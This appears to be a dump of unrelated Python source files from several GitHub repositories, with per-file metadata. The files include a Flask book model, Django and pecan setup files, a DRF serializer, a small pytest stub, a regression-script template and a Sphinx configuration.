title = db.Column(db.String(40), nullable=False)
title_for_route = db.Column(db.String(40), nullable=False)
price = db.Column(db.String(40), nullable=False)
url = db.Column(db.String(40), nullable=False)
def __repr__(self):
return f"{self.id} => {self.title} => {self.price} => {self.url}"
class BookSchema(marshmallow.SQLAlchemySchema):
class Meta:
model = Book
id = marshmallow.auto_field()
title = marshmallow.auto_field()
title_for_route = marshmallow.auto_field()
price = marshmallow.auto_field()
url = marshmallow.auto_field()
| [
"diturra@dparadig.com"
] | diturra@dparadig.com |
a6e84ede469fbe72771be78c555a5612ccf2e137 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_ckeditor_uploader_backends___init___py.html.py | 798d55fc791e5536bdf76c670715ec7c0d91fbb8 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,201 | py | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX
XXXXX XXXXXXXXXX XXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX
XXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XXX XXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XX XXXXXXXXXXXXXXXXXXXXXXX XX XXXX XXXXXXXX
XXXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXXX XXXXXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXX XXXXXXXXXXX XXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXX XX XXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXX XXXXX XXXXXXXXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XX XXXXXXX X XXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXX
XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XX XXXXXXXXXX XXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXXXXX
XXXXXXX
| [
"66747309+OmarFateh@users.noreply.github.com"
] | 66747309+OmarFateh@users.noreply.github.com |
255132307851c3be363fe7e4d69e4d88c27f9f08 | 6d8f8850c86f8fb5fa63c8f17370d23125e6cf1e | /setup.py | 556149d26381d6dcda4f84506e4d435555089efa | [] | no_license | luohaixiannz/pecan_test_project | bdf01935b568eb142fb15b1653dabefc539a0937 | b1168f77a4e00a759fb01a7e535071c6897fe1c5 | refs/heads/master | 2020-08-02T22:15:32.286068 | 2019-10-13T07:25:24 | 2019-10-13T07:25:24 | 211,522,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
setup(
name='pecan_test_project',
version='0.1',
description='',
author='',
author_email='',
install_requires=[
"pecan",
],
test_suite='pecan_test_project',
zip_safe=False,
include_package_data=True,
packages=find_packages(exclude=['ez_setup'])
)
| [
"root@192.168.0.107"
] | root@192.168.0.107 |
9a2245a65c5409a11353e2bdf4ece15398d0a47e | f080acd0d9f5640124cadd8282c9382df509add4 | /MyPlace/wsgi.py | 7862a3d03fab60f5b815b9e0843ed8a2090652b8 | [] | no_license | MagFry/MyPlace | 69e50367f61ade84d2e34408ec1ec23fe7328593 | 60233a87dc979dff505c4c74b3bb2cb644f9d22d | refs/heads/master | 2020-08-22T07:02:51.358987 | 2019-10-20T10:28:20 | 2019-10-20T10:28:20 | 216,343,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
WSGI config for MyPlace project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MyPlace.settings')
application = get_wsgi_application()
| [
"mfryczka96@gmail.com"
] | mfryczka96@gmail.com |
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85 | b91578b96ffe63639d3efc70d4737b92091cd0b1 | /backend/unpp_api/apps/sanctionslist/serializers.py | 3d57ed5f866b73fbe8dde2953857e5e283fedb35 | [
"Apache-2.0"
] | permissive | unicef/un-partner-portal | 876b6ec394909ed2f72777493623413e9cecbfdc | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | refs/heads/develop | 2023-02-06T21:08:22.037975 | 2019-05-20T07:35:29 | 2019-05-20T07:35:29 | 96,332,233 | 6 | 1 | Apache-2.0 | 2023-01-25T23:21:41 | 2017-07-05T15:07:44 | JavaScript | UTF-8 | Python | false | false | 633 | py | from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
class Meta:
model = SanctionedNameMatch
exclude = (
'partner',
'can_ignore',
'can_ignore_text',
)
| [
"maciej.jaworski@tivix.com"
] | maciej.jaworski@tivix.com |
6d7a90d3a937dd973e04b37a56190fc593aaaff0 | 45df32d998f8edf8ea3929b939c8b81a48eae6cf | /vegify/read_csv_test.py | 1e6bce0e7a4d78ce34e7c9748bf87de49bed9a80 | [] | no_license | FriedBender/shiny-pancake | 086654daddec42d57c7b984b2e1be65d05135f7e | 54a14d19510482662d833a8a5772295e5f426c9d | refs/heads/master | 2023-05-06T19:10:18.420770 | 2021-05-19T20:12:35 | 2021-05-19T20:12:35 | 367,722,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | import pytest
from . import read_csv
import csv
# These are local to FriedBenders file structure, modify them as needed
location_of_skus = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/itemSKUs.csv'
location_of_Menu_Alternatives = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/MenuItemAlternatives.csv'
location_of_Menu_Item_Ingrediants = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/menuItemIngrediants.csv'
class TestCsv:
def test_open_read_csv_file(self):
opened_file = open(location_of_skus, 'r', newline='')
test_header = next(opened_file)
csv_file = opened_file
| [
"maxsemchuk@icloud.com"
] | maxsemchuk@icloud.com |
2b5406445f055b8f76f085481dde082f1634c1ff | fe8c038452ff1067693d7b0e61f7004d15b0f791 | /01-Crash Course/week-03/02-Foor_loop/quiz_for-loop_factorial.py | eb425075bb00b8fd8a307b8572f775ff1713c858 | [] | no_license | varunjha089/Google-IT-Automation-with-Python | 73fec6a6a3348d4a5039dd78fa26eb1509b37db0 | 3eb176a989244ead534d194101d7f2da7a2a00ab | refs/heads/master | 2022-11-23T22:17:13.814889 | 2020-08-02T04:38:51 | 2020-08-02T04:38:51 | 273,307,102 | 0 | 0 | null | 2020-07-05T12:00:18 | 2020-06-18T18:04:26 | Python | UTF-8 | Python | false | false | 161 | py | def factorial(n):
result = 1
for x in range(1, n):
result = result * x
return result
for n in range(0, 10):
print(n, factorial(n + 1))
| [
"varunjha089@gmail.com"
] | varunjha089@gmail.com |
9ef5e5fee2e79e57e5166dc15c07384e10dad3c5 | ff8c52894b957eec143f56a6c5b6c331c2d5a6a1 | /4 - Polynomial Regression/Python/regressor_template.py | 798003c20c33cc9fa5838a723ca3423b53f98d8e | [] | no_license | thimontenegro/Machine-Learning | c9dd2165f6d9d55927b8d22ae2146cb67177ac67 | 33bcab62d6523fe7c4d7f760854df25eccb1420c | refs/heads/master | 2020-04-25T15:51:21.327587 | 2020-02-25T18:49:39 | 2020-02-25T18:49:39 | 172,891,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,869 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 00:17:31 2019
@author: Thiago Montenegro
"""
#Regressor Template
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
#Importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
Y = dataset.iloc[:, 2].values
#Spliotting the dataset into the Training set and Test Set
"""
from sklearn.model_selection import train_test_split
X_train,X_test,Y_train,Y_test = train_test_split(X,y, test_size = 0.2, random_state = 0)
"""
#Feature Scaling
"""
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
"""
#Fitting the Regression Model to the dataset
#create your regressor here
#Comparing Linear Regression vs Polynomial Regression
from sklearn.linear_model import LinearRegression
#Fitting the Regression Model to the dataset
linear_regressor = LinearRegression()
#Predicting a new Result with Linear Regression
#Predicting a new Result with Polynomial Regression
y_pred = regressor.predict([[6.5]])
#Visualising the Regression Results
plt.scatter(X,Y, color = 'blue')
plt.plot(X,regressor.predict(X), color = 'black')
plt.xlabel("Position Levels")
plt.ylabel('Salary')
plt.title('Truth or Bluff (Regression Model)')
plt.show()
#Visualising the Regression results(fir higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid),1))
#Visualising the Polynomial Regression Results
plt.scatter(X,Y, color = 'blue')
plt.plot(X_grid,regressor.predict(X_grid), color = 'black')
plt.xlabel("Position Levels")
plt.ylabel('Salary')
plt.title('Truth or Bluff (Regression Model)')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
5af1652e71e6675f99c875dcb9695b1034b4e964 | abb8e5cf8c7ff330e424490f1425b3dfa1318910 | /docs/conf.py | 0e1815215051fbe6692ee04d654a566f82e98baa | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | fonclub/instagram_private_api | 94e887700d934eae2eece8a3623d9b28502c2c57 | fe29b092f591a059502ec070dfc4ba4113c34e43 | refs/heads/master | 2021-01-11T13:44:24.646424 | 2017-06-22T04:24:06 | 2017-06-22T04:24:06 | 95,124,093 | 1 | 0 | null | 2017-06-22T14:27:48 | 2017-06-22T14:27:47 | null | UTF-8 | Python | false | false | 4,962 | py | # -*- coding: utf-8 -*-
#
# instagram_private_api documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 13 15:42:33 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# import instagram_private_api
# import instagram_web_api
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'instagram_private_api'
copyright = u'2017, ping'
author = u'ping'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.3.4'
# The full version, including alpha/beta/rc tags.
release = u'1.3.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'instagram_private_apidoc'
